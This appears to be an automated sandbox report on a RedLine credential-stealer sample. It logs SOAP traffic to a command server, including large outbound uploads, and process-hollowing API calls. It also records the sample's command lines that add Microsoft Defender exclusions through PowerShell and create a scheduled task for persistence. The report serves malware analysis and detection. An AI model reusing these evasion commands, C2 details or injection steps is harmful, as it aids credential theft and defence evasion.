                      Content-Type: text/xml; charset=utf-8
                      SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"
                      Host: 185.222.57.91:55615
                      Content-Length: 137
                      Expect: 100-continue
                      Accept-Encoding: gzip, deflate
                      Connection: Keep-Alive
                      Aug 30, 2024 08:02:12.709861040 CEST359INHTTP/1.1 200 OK
                      Content-Length: 212
                      Content-Type: text/xml; charset=utf-8
                      Server: Microsoft-HTTPAPI/2.0
                      Date: Fri, 30 Aug 2024 06:02:12 GMT
                      Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 3e 3c 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 75 6c 74 3e 74 72 75 65 3c 2f 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 75 6c 74 3e 3c 2f 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 70 6f 6e 73 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e
                      Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><CheckConnectResponse xmlns="http://tempuri.org/"><CheckConnectResult>true</CheckConnectResult></CheckConnectResponse></s:Body></s:Envelope>
                      Aug 30, 2024 08:02:12.923157930 CEST359INHTTP/1.1 200 OK
                      Content-Length: 212
                      Content-Type: text/xml; charset=utf-8
                      Server: Microsoft-HTTPAPI/2.0
                      Date: Fri, 30 Aug 2024 06:02:12 GMT
                      Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 3e 3c 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 75 6c 74 3e 74 72 75 65 3c 2f 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 75 6c 74 3e 3c 2f 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 70 6f 6e 73 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e
                      Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><CheckConnectResponse xmlns="http://tempuri.org/"><CheckConnectResult>true</CheckConnectResult></CheckConnectResponse></s:Body></s:Envelope>
                      Aug 30, 2024 08:02:17.767611027 CEST223OUTPOST / HTTP/1.1
                      Content-Type: text/xml; charset=utf-8
                      SOAPAction: "http://tempuri.org/Endpoint/EnvironmentSettings"
                      Host: 185.222.57.91:55615
                      Content-Length: 144
                      Expect: 100-continue
                      Accept-Encoding: gzip, deflate
                      Aug 30, 2024 08:02:17.937657118 CEST25INHTTP/1.1 100 Continue
                      Aug 30, 2024 08:02:18.036274910 CEST1236INHTTP/1.1 200 OK
                      Content-Length: 6625
                      Content-Type: text/xml; charset=utf-8
                      Server: Microsoft-HTTPAPI/2.0
                      Date: Fri, 30 Aug 2024 06:02:17 GMT
                      Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 45 6e 76 69 72 6f 6e 6d 65 6e 74 53 65 74 74 69 6e 67 73 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 3e 3c 45 6e 76 69 72 6f 6e 6d 65 6e 74 53 65 74 74 69 6e 67 73 52 65 73 75 6c 74 20 78 6d 6c 6e 73 3a 61 3d 22 42 72 6f 77 73 65 72 45 78 74 65 6e 73 69 6f 6e 22 20 78 6d 6c 6e 73 3a 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 3e 3c 61 3a 42 6c 6f 63 6b 65 64 43 6f 75 6e 74 72 79 20 78 6d 6c 6e 73 3a 62 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 32 30 30 33 2f 31 30 2f 53 65 72 69 61 6c 69 7a 61 74 69 6f 6e 2f 41 72 72 61 79 73 22 2f 3e 3c 61 3a 42 6c 6f 63 6b 65 64 49 50 20 78 6d 6c [TRUNCATED]
                      Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><EnvironmentSettingsResponse xmlns="http://tempuri.org/"><EnvironmentSettingsResult xmlns:a="BrowserExtension" xmlns:i="http://www.w3.org/2001/XMLSchema-instance"><a:BlockedCountry xmlns:b="http://schemas.microsoft.com/2003/10/Serialization/Arrays"/><a:BlockedIP xmlns:b="http://schemas.microsoft.com/2003/10/Serialization/Arrays"><b:string>202.10.61.127</b:string><b:string>183.155.33.34</b:string><b:string>103.138.49.24</b:string><b:string>36.26.100.62</b:string><b:string>49.89.92.98</b:string><b:string>183.208.114.83</b:string><b:string>139.186.206.86</b:string><b:string>49.74.245.112</b:string><b:string>183.151.6.172</b:string><b:string>91.192.81.11</b:string><b:string>222.247.0.195</b:string><b:string>115.150.176.197</b:string><b:string>116.4.200.54</b:string><b:string>13.89.107.79</b:string><b:string>58.253.61.2</b:string><b:string>119.126.114.250</b:string><b:string>34.141.245.25</b:string><b:string>20.99.160.173</b:string [TRUNCATED]


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      3192.168.2.549723185.222.57.91556156784C:\Users\user\AppData\Roaming\WltfeVzR.exe
                      TimestampBytes transferredDirectionData
                      Aug 30, 2024 08:02:20.458463907 CEST221OUTPOST / HTTP/1.1
                      Content-Type: text/xml; charset=utf-8
                      SOAPAction: "http://tempuri.org/Endpoint/SetEnvironment"
                      Host: 185.222.57.91:55615
                      Content-Length: 952830
                      Expect: 100-continue
                      Accept-Encoding: gzip, deflate
                      Aug 30, 2024 08:02:22.006684065 CEST294INHTTP/1.1 200 OK
                      Content-Length: 147
                      Content-Type: text/xml; charset=utf-8
                      Server: Microsoft-HTTPAPI/2.0
                      Date: Fri, 30 Aug 2024 06:02:21 GMT
                      Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 53 65 74 45 6e 76 69 72 6f 6e 6d 65 6e 74 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 2f 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e
                      Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><SetEnvironmentResponse xmlns="http://tempuri.org/"/></s:Body></s:Envelope>


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      4192.168.2.549724185.222.57.91556156784C:\Users\user\AppData\Roaming\WltfeVzR.exe
                      TimestampBytes transferredDirectionData
                      Aug 30, 2024 08:02:22.013967037 CEST241OUTPOST / HTTP/1.1
                      Content-Type: text/xml; charset=utf-8
                      SOAPAction: "http://tempuri.org/Endpoint/GetUpdates"
                      Host: 185.222.57.91:55615
                      Content-Length: 952822
                      Expect: 100-continue
                      Accept-Encoding: gzip, deflate
                      Connection: Keep-Alive
                      Aug 30, 2024 08:02:24.338779926 CEST408INHTTP/1.1 200 OK
                      Content-Length: 261
                      Content-Type: text/xml; charset=utf-8
                      Server: Microsoft-HTTPAPI/2.0
                      Date: Fri, 30 Aug 2024 06:02:24 GMT
                      Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 47 65 74 55 70 64 61 74 65 73 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 3e 3c 47 65 74 55 70 64 61 74 65 73 52 65 73 75 6c 74 20 78 6d 6c 6e 73 3a 61 3d 22 42 72 6f 77 73 65 72 45 78 74 65 6e 73 69 6f 6e 22 20 78 6d 6c 6e 73 3a 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 2f 3e 3c 2f 47 65 74 55 70 64 61 74 65 73 52 65 73 70 6f 6e 73 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e
                      Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><GetUpdatesResponse xmlns="http://tempuri.org/"><GetUpdatesResult xmlns:a="BrowserExtension" xmlns:i="http://www.w3.org/2001/XMLSchema-instance"/></GetUpdatesResponse></s:Body></s:Envelope>


                      Statistics

                      CPU Usage

                      Click to jump to process

                      Memory Usage

                      Click to jump to process

                      High Level Behavior Distribution

                      Click to dive into process behavior distribution

                      Behavior

                      Click to jump to process

                      System Behavior

                      General

                      Target ID:0
                      Start time:02:01:52
                      Start date:30/08/2024
                      Path:C:\Users\user\Desktop\tfF3UBTdr8.exe
                      Wow64 process (32bit):true
                      Commandline:"C:\Users\user\Desktop\tfF3UBTdr8.exe"
                      Imagebase:0xd00000
                      File size:661'000 bytes
                      MD5 hash:05211F48DBBB4EF891DB1E158FF87E28
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Yara matches:
                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.2096396711.0000000004210000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000000.00000002.2096396711.0000000004210000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: Windows_Trojan_RedLineStealer_f54632eb, Description: unknown, Source: 00000000.00000002.2096396711.0000000004210000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                      Reputation:low
                      Has exited:true

                      General

                      Target ID:3
                      Start time:02:01:58
                      Start date:30/08/2024
                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      Wow64 process (32bit):true
                      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\tfF3UBTdr8.exe"
                      Imagebase:0x550000
                      File size:433'152 bytes
                      MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high
                      Has exited:true

                      General

                      Target ID:4
                      Start time:02:01:58
                      Start date:30/08/2024
                      Path:C:\Windows\System32\conhost.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Imagebase:0x7ff6d64d0000
                      File size:862'208 bytes
                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high
                      Has exited:true

                      General

                      Target ID:5
                      Start time:02:01:58
                      Start date:30/08/2024
                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      Wow64 process (32bit):true
                      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\WltfeVzR.exe"
                      Imagebase:0x550000
                      File size:433'152 bytes
                      MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high
                      Has exited:true

                      General

                      Target ID:6
                      Start time:02:01:58
                      Start date:30/08/2024
                      Path:C:\Windows\System32\conhost.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Imagebase:0x7ff6d64d0000
                      File size:862'208 bytes
                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high
                      Has exited:true

                      General

                      Target ID:7
                      Start time:02:01:58
                      Start date:30/08/2024
                      Path:C:\Windows\SysWOW64\schtasks.exe
                      Wow64 process (32bit):true
                      Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\WltfeVzR" /XML "C:\Users\user\AppData\Local\Temp\tmp8652.tmp"
                      Imagebase:0x880000
                      File size:187'904 bytes
                      MD5 hash:48C2FE20575769DE916F48EF0676A965
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high
                      Has exited:true

                      General

                      Target ID:8
                      Start time:02:01:58
                      Start date:30/08/2024
                      Path:C:\Windows\System32\conhost.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Imagebase:0x7ff6d64d0000
                      File size:862'208 bytes
                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high
                      Has exited:true

                      General

                      Target ID:9
                      Start time:02:01:59
                      Start date:30/08/2024
                      Path:C:\Users\user\Desktop\tfF3UBTdr8.exe
                      Wow64 process (32bit):true
                      Commandline:"C:\Users\user\Desktop\tfF3UBTdr8.exe"
                      Imagebase:0xe10000
                      File size:661'000 bytes
                      MD5 hash:05211F48DBBB4EF891DB1E158FF87E28
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Yara matches:
                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000009.00000002.2204991581.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000009.00000002.2204991581.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: Windows_Trojan_RedLineStealer_f54632eb, Description: unknown, Source: 00000009.00000002.2204991581.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                      Reputation:low
                      Has exited:true

                      General

                      Target ID:10
                      Start time:02:01:59
                      Start date:30/08/2024
                      Path:C:\Windows\System32\conhost.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Imagebase:0x7ff6d64d0000
                      File size:862'208 bytes
                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high
                      Has exited:true

                      General

                      Target ID:11
                      Start time:02:02:00
                      Start date:30/08/2024
                      Path:C:\Users\user\AppData\Roaming\WltfeVzR.exe
                      Wow64 process (32bit):true
                      Commandline:C:\Users\user\AppData\Roaming\WltfeVzR.exe
                      Imagebase:0xc60000
                      File size:661'000 bytes
                      MD5 hash:05211F48DBBB4EF891DB1E158FF87E28
                      Has elevated privileges:false
                      Has administrator privileges:false
                      Programmed in:C, C++ or other language
                      Yara matches:
                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000B.00000002.2196920043.0000000004141000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000000B.00000002.2196920043.0000000004141000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: Windows_Trojan_RedLineStealer_f54632eb, Description: unknown, Source: 0000000B.00000002.2196920043.0000000004141000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                      Antivirus matches:
                      • Detection: 68%, ReversingLabs
                      • Detection: 45%, Virustotal, Browse
                      Reputation:low
                      Has exited:true

                      General

                      Target ID:12
                      Start time:02:02:01
                      Start date:30/08/2024
                      Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                      Imagebase:0x7ff6ef0c0000
                      File size:496'640 bytes
                      MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                      Has elevated privileges:true
                      Has administrator privileges:false
                      Programmed in:C, C++ or other language
                      Reputation:high
                      Has exited:true

                      General

                      Target ID:13
                      Start time:02:02:08
                      Start date:30/08/2024
                      Path:C:\Windows\SysWOW64\schtasks.exe
                      Wow64 process (32bit):true
                      Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\WltfeVzR" /XML "C:\Users\user\AppData\Local\Temp\tmpAD91.tmp"
                      Imagebase:0x880000
                      File size:187'904 bytes
                      MD5 hash:48C2FE20575769DE916F48EF0676A965
                      Has elevated privileges:false
                      Has administrator privileges:false
                      Programmed in:C, C++ or other language
                      Reputation:high
                      Has exited:true

                      General

                      Target ID:14
                      Start time:02:02:09
                      Start date:30/08/2024
                      Path:C:\Windows\System32\conhost.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Imagebase:0x7ff6d64d0000
                      File size:862'208 bytes
                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                      Has elevated privileges:false
                      Has administrator privileges:false
                      Programmed in:C, C++ or other language
                      Reputation:high
                      Has exited:true

                      General

                      Target ID:16
                      Start time:02:02:09
                      Start date:30/08/2024
                      Path:C:\Users\user\AppData\Roaming\WltfeVzR.exe
                      Wow64 process (32bit):true
                      Commandline:"C:\Users\user\AppData\Roaming\WltfeVzR.exe"
                      Imagebase:0x890000
                      File size:661'000 bytes
                      MD5 hash:05211F48DBBB4EF891DB1E158FF87E28
                      Has elevated privileges:false
                      Has administrator privileges:false
                      Programmed in:C, C++ or other language
                      Reputation:low
                      Has exited:true

                      General

                      Target ID:17
                      Start time:02:02:09
                      Start date:30/08/2024
                      Path:C:\Windows\System32\conhost.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Imagebase:0x7ff6d64d0000
                      File size:862'208 bytes
                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                      Has elevated privileges:false
                      Has administrator privileges:false
                      Programmed in:C, C++ or other language
                      Reputation:high
                      Has exited:true

                      Disassembly

                      Reset < >

                        Execution Graph

                        Execution Coverage:12.7%
                        Dynamic/Decrypted Code Coverage:100%
                        Signature Coverage:0.6%
                        Total number of Nodes:179
                        Total number of Limit Nodes:9
                        execution_graph 19650 76bb778 19651 76bb903 19650->19651 19652 76bb79e 19650->19652 19652->19651 19654 76b8168 19652->19654 19655 76bb9f8 PostMessageW 19654->19655 19656 76bba64 19655->19656 19656->19652 19847 30d4668 19848 30d467a 19847->19848 19849 30d4686 19848->19849 19851 30d4778 19848->19851 19852 30d479d 19851->19852 19856 30d4879 19852->19856 19860 30d4888 19852->19860 19857 30d4888 19856->19857 19858 30d498c 19857->19858 19864 30d44b4 19857->19864 19861 30d48af 19860->19861 19862 30d498c 19861->19862 19863 30d44b4 CreateActCtxA 19861->19863 19862->19862 19863->19862 19865 30d5918 CreateActCtxA 19864->19865 19867 30d59db 19865->19867 19867->19867 19868 30dee38 19871 30def30 19868->19871 19869 30dee47 19872 30def41 19871->19872 19873 30def64 19871->19873 19872->19873 19878 30df1c8 19872->19878 19873->19869 19874 30df168 GetModuleHandleW 19876 30df195 19874->19876 19875 30def5c 19875->19873 19875->19874 19876->19869 19879 30df1dc 19878->19879 19881 30df201 19879->19881 19882 30de960 19879->19882 19881->19875 19883 30df3a8 LoadLibraryExW 19882->19883 19885 30df421 19883->19885 19885->19881 19657 76b7bf5 19658 76b79dc 19657->19658 19659 76b79eb 19658->19659 19663 76ba588 19658->19663 19683 76ba5fe 19658->19683 19704 76ba598 19658->19704 19664 76ba598 19663->19664 19724 76baab0 19664->19724 19729 76bab71 19664->19729 19734 76bb25d 19664->19734 19739 76baf7f 19664->19739 19745 76bb344 19664->19745 19749 76bae46 19664->19749 19753 76baf06 19664->19753 19757 76badc7 19664->19757 19761 76ba9e0 19664->19761 19768 76baa40 19664->19768 19773 76bac40 19664->19773 19777 76bab8c 19664->19777 19781 76baa8c 19664->19781 19786 76baccf 19664->19786 19790 76bb30b 19664->19790 19794 76babb4 19664->19794 19798 76bac17 19664->19798 19665 76ba5ba 19665->19659 19684 76ba58c 19683->19684 19685 76ba601 19683->19685 19687 76bb30b 2 API calls 19684->19687 19688 76baccf ResumeThread 19684->19688 19689 76baa8c 2 API calls 19684->19689 19690 76bab8c 2 API calls 19684->19690 19691 76bac40 2 API calls 19684->19691 19692 76baa40 2 API calls 19684->19692 19693 76ba9e0 4 API calls 19684->19693 19694 76badc7 ResumeThread 19684->19694 19695 76baf06 2 API calls 19684->19695 19696 76bae46 ResumeThread 19684->19696 19697 76bb344 2 API calls 19684->19697 19698 76baf7f 2 API calls 19684->19698 19699 76bb25d ResumeThread 19684->19699 19700 76bab71 2 API calls 19684->19700 19701 76baab0 2 API calls 19684->19701 19702 76bac17 2 API calls 19684->19702 19703 76babb4 2 API calls 19684->19703 19685->19659 19686 76ba5ba 19686->19659 19687->19686 19688->19686 19689->19686 19690->19686 19691->19686 19692->19686 19693->19686 19694->19686 19695->19686 19696->19686 19697->19686 19698->19686 19699->19686 19700->19686 19701->19686 19702->19686 19703->19686 19705 76ba5b2 19704->19705 19707 76bb30b 2 API calls 19705->19707 19708 76baccf ResumeThread 19705->19708 19709 76baa8c 2 API calls 19705->19709 19710 76bab8c 2 API calls 19705->19710 19711 76bac40 2 API calls 19705->19711 19712 76baa40 2 API calls 19705->19712 19713 76ba9e0 4 API calls 19705->19713 19714 76badc7 ResumeThread 19705->19714 19715 76baf06 2 API calls 19705->19715 19716 76bae46 ResumeThread 19705->19716 19717 76bb344 2 API calls 19705->19717 19718 76baf7f 2 API calls 19705->19718 19719 76bb25d ResumeThread 19705->19719 19720 76bab71 2 API calls 19705->19720 19721 76baab0 2 API calls 19705->19721 19722 76bac17 2 API calls 19705->19722 19723 76babb4 2 API calls 19705->19723 19706 76ba5ba 19706->19659 19707->19706 19708->19706 19709->19706 19710->19706 19711->19706 19712->19706 19713->19706 19714->19706 19715->19706 19716->19706 19717->19706 19718->19706 19719->19706 19720->19706 19721->19706 19722->19706 19723->19706 19726 76baa4c 19724->19726 19725 76baa5e 19725->19665 19726->19725 19803 76b7330 19726->19803 19807 76b7338 19726->19807 19730 76baa4c 19729->19730 19731 76baa5e 19730->19731 19732 76b7338 WriteProcessMemory 19730->19732 19733 76b7330 WriteProcessMemory 19730->19733 19731->19665 19732->19730 19733->19730 19735 76bb26a 19734->19735 19736 76bace6 19734->19736 19811 76b70f0 19736->19811 19741 76bac3f 19739->19741 19740 76bb304 19740->19665 19741->19740 19815 76b71a0 19741->19815 19819 76b7199 19741->19819 19742 76bac5a 19742->19665 19747 76b7338 WriteProcessMemory 19745->19747 19748 76b7330 WriteProcessMemory 19745->19748 19746 76bb368 19747->19746 19748->19746 19750 76bae6f 19749->19750 19752 76b70f0 ResumeThread 19750->19752 19751 76bae84 19752->19751 19823 76b7278 19753->19823 19827 76b7271 19753->19827 19754 76baf24 19758 76badcd 19757->19758 19760 76b70f0 ResumeThread 19758->19760 19759 76bae84 19760->19759 19831 76b75c0 19761->19831 19835 76b75b4 19761->19835 19769 76baa4c 19768->19769 19770 76baa5e 19769->19770 19771 76b7338 WriteProcessMemory 19769->19771 19772 76b7330 WriteProcessMemory 19769->19772 19770->19665 19771->19769 19772->19769 19775 76b7199 Wow64SetThreadContext 19773->19775 19776 76b71a0 Wow64SetThreadContext 19773->19776 19774 76bac5a 19774->19665 19775->19774 19776->19774 19778 76bb1ad 19777->19778 19779 76b7338 WriteProcessMemory 19778->19779 19780 76b7330 WriteProcessMemory 19778->19780 19779->19778 19780->19778 19782 76baa4c 19781->19782 19783 76baa5e 19782->19783 19784 76b7338 WriteProcessMemory 19782->19784 19785 76b7330 WriteProcessMemory 19782->19785 19783->19665 19784->19782 19785->19782 19787 76bacd5 19786->19787 19789 76b70f0 ResumeThread 19787->19789 19788 76bae84 19789->19788 19792 76b7199 Wow64SetThreadContext 19790->19792 19793 76b71a0 Wow64SetThreadContext 19790->19793 19791 76bb325 19792->19791 19793->19791 19839 76b7428 19794->19839 19843 76b7420 19794->19843 19795 76bab60 19795->19665 19799 76baa4c 19798->19799 19799->19798 19800 76baa5e 19799->19800 19801 76b7338 WriteProcessMemory 19799->19801 19802 76b7330 WriteProcessMemory 19799->19802 19800->19665 19801->19799 19802->19799 19804 76b7380 WriteProcessMemory 19803->19804 19806 76b73d7 19804->19806 19806->19726 19808 76b7380 WriteProcessMemory 19807->19808 19810 76b73d7 19808->19810 19810->19726 19812 76b7130 ResumeThread 19811->19812 19814 76b7161 19812->19814 19816 76b71e5 Wow64SetThreadContext 19815->19816 19818 76b722d 19816->19818 19818->19742 19820 76b71a0 Wow64SetThreadContext 19819->19820 19822 76b722d 19820->19822 19822->19742 19824 76b72b8 VirtualAllocEx 19823->19824 19826 76b72f5 19824->19826 19826->19754 19828 76b72b8 VirtualAllocEx 19827->19828 19830 76b72f5 19828->19830 19830->19754 19832 76b7649 CreateProcessA 19831->19832 19834 76b780b 19832->19834 19834->19834 19836 76b75c0 19835->19836 19836->19836 19837 76b77ae CreateProcessA 19836->19837 19838 76b780b 19837->19838 19838->19838 19840 76b7473 ReadProcessMemory 19839->19840 19842 76b74b7 19840->19842 19842->19795 19844 76b7428 ReadProcessMemory 19843->19844 19846 76b74b7 19844->19846 19846->19795

                        Executed Functions

                        Function 076BA9E0 Relevance: .1, Instructions: 69COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.2102463432.00000000076B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076B0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_76b0000_tfF3UBTdr8.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 011588aba887d6c859da3a69fb4efe9875faa9c56570dae1118cdfb71ade77b4
                        • Instruction ID: 0d6aecb965319b21469fe3ca5d72f19cd47625664b3f5e6a96822c3a2f9453a4
                        • Opcode Fuzzy Hash: 011588aba887d6c859da3a69fb4efe9875faa9c56570dae1118cdfb71ade77b4
                        • Instruction Fuzzy Hash: 70211DB4D19268CFDB20CF64C945BE8BBB9AB0B300F0491DAD54EA7242D7745AC6CF51
                        Function 076B75B4 Relevance: 1.8, APIs: 1, Instructions: 252processCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 520 76b75b4-76b7655 523 76b768e-76b76ae 520->523 524 76b7657-76b7661 520->524 531 76b76b0-76b76ba 523->531 532 76b76e7-76b7716 523->532 524->523 525 76b7663-76b7665 524->525 526 76b7688-76b768b 525->526 527 76b7667-76b7671 525->527 526->523 529 76b7673 527->529 530 76b7675-76b7684 527->530 529->530 530->530 533 76b7686 530->533 531->532 534 76b76bc-76b76be 531->534 538 76b7718-76b7722 532->538 539 76b774f-76b7809 CreateProcessA 532->539 533->526 536 76b76e1-76b76e4 534->536 537 76b76c0-76b76ca 534->537 536->532 540 76b76ce-76b76dd 537->540 541 76b76cc 537->541 538->539 543 76b7724-76b7726 538->543 552 76b780b-76b7811 539->552 553 76b7812-76b7898 539->553 540->540 542 76b76df 540->542 541->540 542->536 544 76b7749-76b774c 543->544 545 76b7728-76b7732 543->545 544->539 547 76b7736-76b7745 545->547 548 76b7734 545->548 547->547 550 76b7747 547->550 548->547 550->544 552->553 563 76b789a-76b789e 553->563 564 76b78a8-76b78ac 553->564 563->564 565 76b78a0 563->565 566 76b78ae-76b78b2 564->566 567 76b78bc-76b78c0 564->567 565->564 566->567 568 76b78b4 566->568 569 76b78c2-76b78c6 567->569 570 76b78d0-76b78d4 567->570 568->567 